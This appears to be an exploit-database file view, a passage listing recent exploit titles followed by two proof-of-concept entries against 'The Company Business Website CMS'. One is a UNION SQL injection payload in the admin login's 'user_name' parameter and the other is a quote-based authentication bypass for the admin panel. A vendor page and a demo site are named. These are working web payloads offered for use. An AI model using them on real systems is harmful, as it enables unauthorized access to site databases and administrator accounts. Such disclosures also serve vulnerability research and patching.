34e4bc14d9
8 changes to exploits/shellcodes Canarytokens 2019-03-01 - Detection Bypass DVD X Player 5.5.3 - '.plf' Buffer Overflow Netartmedia Vlog System - 'email' SQL Injection Rails 5.2.1 - Arbitrary File Content Disclosure The Company Business Website CMS - Multiple Vulnerabilities uHotelBooking System - 'system_page' SQL Injection Placeto CMS Alpha v4 - 'page' SQL Injection Bootstrapy CMS - Multiple SQL Injection
31 lines
No EOL
1.1 KiB
Text
31 lines
No EOL
1.1 KiB
Text
# Exploit Title: The Company Business Website CMS - 'user_name' SQL
|
|
Injection
|
|
# Date: 20.03.2019
|
|
# Exploit Author: Ahmet Ümit BAYRAM
|
|
# Vendor Homepage: https://www.codester.com/items/6806/the-company-business-website-cms
|
|
# Demo Site: http://thecompany.morkocbilisim.com
|
|
# Version: Lastest
|
|
# Tested on: Kali Linux
|
|
# CVE: N/A
|
|
|
|
----- PoC: SQLi -----
|
|
|
|
Request: http://localhost/[PATH]/admin/production/login.php
|
|
Vulnerable Parameter: user_name (POST)
|
|
Payload: user_name=VNfn' UNION ALL SELECT
|
|
NULL,NULL,NULL,CONCAT(CONCAT('qqkxq','mOiFXJaJzzATyiPlJyQgwuuTiDddtckLMPRRRdEH'),'qjbbq'),NULL,NULL,NULL,NULL--
|
|
WMfV&user_password=&loggin=Psop
|
|
|
|
|
|
# Exploit Title: The Company Business Website CMS - Authentication Bypass
|
|
# Date: 20.03.2019
|
|
# Exploit Author: Ahmet Ümit BAYRAM
|
|
# Vendor Homepage: https://www.codester.com/items/6806/the-company-business-website-cms
|
|
# Demo Site: http://thecompany.morkocbilisim.com
|
|
# Version: Lastest
|
|
# Tested on: Kali Linux
|
|
# CVE: N/A
|
|
----- PoC: Authentication Bypass -----
|
|
Administration Panel: http://localhost/[PATH]/admin/production/login.php
|
|
Username: '=' 'or'
|
|
Password: '=' 'or' |